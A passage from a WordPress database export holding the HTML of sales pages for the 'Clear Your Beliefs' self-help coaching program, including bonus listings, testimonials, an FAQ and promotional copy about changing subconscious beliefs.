real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p>// </p>\n<h3 class="widget-title">CYB banner header</h3>			 <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">', 'Partners', '', 'inherit', 'open', 'open', '', '2161-revision-v1', '', '', '2015-05-12 12:56:58', '2015-05-12 17:56:58', '', 2161, 'http://clearyourbeliefs.com/2161-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2170, 2, '2015-05-12 13:01:43', '2015-05-12 18:01:43', '<p></p>\n\n<p></p>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<p>&nbsp;</p>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<p>&nbsp;</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially 